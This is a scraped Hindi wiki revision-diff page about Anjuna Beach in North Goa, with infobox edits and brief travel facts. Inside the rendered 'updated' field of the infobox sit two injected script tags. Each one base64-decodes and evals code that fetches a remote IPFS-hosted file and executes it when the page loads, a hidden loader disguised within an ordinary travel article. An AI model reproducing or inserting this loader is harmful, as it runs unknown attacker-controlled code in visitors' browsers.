Difference between revisions of "अंजुना तट गोवा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 11: Line 11:
 
|निर्माण काल=
 
|निर्माण काल=
 
|स्थापना=
 
|स्थापना=
|भौगोलिक स्थिति=
+
|भौगोलिक स्थिति=उत्तर- 15°42′; पूर्व- 73°42′
|मार्ग स्थिति=
+
|मार्ग स्थिति=डबोलिम हवाई अड्डा से 61.9 किलोमीटर की दूरी पर स्थित है।
 
|प्रसिद्धि=
 
|प्रसिद्धि=
|कब जाएँ=
+
|कब जाएँ=[[सितम्बर]] से [[अप्रैल]]
|कैसे पहुँचें=
+
|कैसे पहुँचें=हवाई जहाज़, रेल व सड़क मार्ग द्वारा पहुँचा जा सकता है।
|हवाई अड्डा=
+
|हवाई अड्डा=डबोलिम हवाई अड्डा, पणजी हवाई अड्डा
|रेलवे स्टेशन=
+
|रेलवे स्टेशन=वास्को रेलवे स्टेशन, मडगांव रेलवे स्टेशन
 
|बस अड्डा=
 
|बस अड्डा=
 
|यातायात=टैक्सी, रिक्शा
 
|यातायात=टैक्सी, रिक्शा
Line 23: Line 23:
 
|कहाँ ठहरें=होटल, धर्मशाला, अतिथि ग्रह  
 
|कहाँ ठहरें=होटल, धर्मशाला, अतिथि ग्रह  
 
|क्या खायें=
 
|क्या खायें=
|क्या ख़रीदें=गहने, [[फल]] आदि।
+
|क्या ख़रीदें=
|एस.टी.डी. कोड=
+
|एस.टी.डी. कोड=9111
 
|ए.टी.एम=
 
|ए.टी.एम=
 
|सावधानी=
 
|सावधानी=
|मानचित्र लिंक=[http://maps.google.com/maps?q=Anjuna+Beach,+Goa&hl=en&ll=15.578882,73.740031&spn=0.002377,0.004769&t=m&z=18&vpsrc=6 गूगल मानचित्र]
+
|मानचित्र लिंक=[http://maps.google.com/maps?q=Anjuna+Beach,+Goa&hl=en&ll=15.578809,73.740063&spn=0.025506,0.045447&t=m&vpsrc=6&hnear=Anjuna+Beach&z=15 अंजुना तट का गूगल मानचित्र]
 
|संबंधित लेख=
 
|संबंधित लेख=
 
|शीर्षक 1=
 
|शीर्षक 1=
Line 37: Line 37:
 
|अद्यतन={{अद्यतन|17:21, 24 सितम्बर 2011 (IST)}}
 
|अद्यतन={{अद्यतन|17:21, 24 सितम्बर 2011 (IST)}}
 
}}
 
}}
 
+
'''अंजुना तट''' उत्तर गोवा में स्थित है। यह गोवा की राजधानी से [[पणजी]] से 18 किलोमीटर दूर है।
*[[गोवा]] को 'पर्यटकों का स्‍वर्ग' कहते हैं। गोवा एक आकर्षक [[गोवा पर्यटन|पर्यटन]] स्थल है।
+
*[[गोवा]] को 'पर्यटकों का स्‍वर्ग' कहते हैं।  
 
*अंजुना तट युवा पीढ़ी के बीच अधिक लोकप्रिय माना जाता है।  
 
*अंजुना तट युवा पीढ़ी के बीच अधिक लोकप्रिय माना जाता है।  
 
*अंजुना तट के पास [[1920]] में निर्मित अल्‍बुक़र्क़ का महल है जो 8 स्‍तंभों से घिरा हुआ है।
 
*अंजुना तट के पास [[1920]] में निर्मित अल्‍बुक़र्क़ का महल है जो 8 स्‍तंभों से घिरा हुआ है।
 
*इस तट पर आकर्षक मेंगलोर टाइल वाली छत है।  
 
*इस तट पर आकर्षक मेंगलोर टाइल वाली छत है।  
*इसे 'दुनिया की गोआनी राजधानी' भी कहते हैं।
+
*इसे '''दुनिया की गोआनी राजधानी''' भी कहते हैं।
 +
 
 +
 
  
{{प्रचार}}
 
{{लेख प्रगति
 
|आधार=
 
|प्रारम्भिक=प्रारम्भिक1
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==वीथिका==
 
==वीथिका==
 
<gallery>
 
<gallery>
Line 59: Line 53:
 
चित्र:Anjuna-Beach.jpg|अंजुना तट, [[गोवा]]
 
चित्र:Anjuna-Beach.jpg|अंजुना तट, [[गोवा]]
 
</gallery>
 
</gallery>
 +
 +
 +
 +
 +
 +
 +
 +
 +
 +
 +
 +
 +
 +
 +
  
 
==संबंधित लेख==
 
==संबंधित लेख==

Revision as of 06:48, 17 October 2011

aanjuna tat gova
vivaran aanjuna tat ke pas 1920 mean nirmit alh‍buqarq ka mahal hai jo 8 sh‍tanbhoan se ghira hua hai.
rajy gova
zila uttar gova
bhaugolik sthiti uttar- 15°42′; poorv- 73°42′
marg sthiti dabolim havaee adda se 61.9 kilomitar ki doori par sthit hai.
kab jaean sitambar se aprail
kaise pahuanchean havaee jahaz, rel v s dak marg dvara pahuancha ja sakata hai.
havaee adda dabolim havaee adda, panaji havaee adda
relave steshan vasko relave steshan, madagaanv relave steshan
yatayat taiksi, riksha
kya dekhean pissoo bajar, alh‍buqarq ka mahal adi.
kahaan thaharean hotal, dharmashala, atithi grah
es.ti.di. kod 9111
chitr:Map-icon.gif aanjuna tat ka googal manachitr
adyatan‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

aanjuna tat uttar gova mean sthit hai. yah gova ki rajadhani se panaji se 18 kilomitar door hai.

  • gova ko 'paryatakoan ka sh‍varg' kahate haian.
  • aanjuna tat yuva pidhi ke bich adhik lokapriy mana jata hai.
  • aanjuna tat ke pas 1920 mean nirmit alh‍buqarq ka mahal hai jo 8 sh‍tanbhoan se ghira hua hai.
  • is tat par akarshak meangalor tail vali chhat hai.
  • ise duniya ki goani rajadhani bhi kahate haian.


vithika









sanbandhit lekh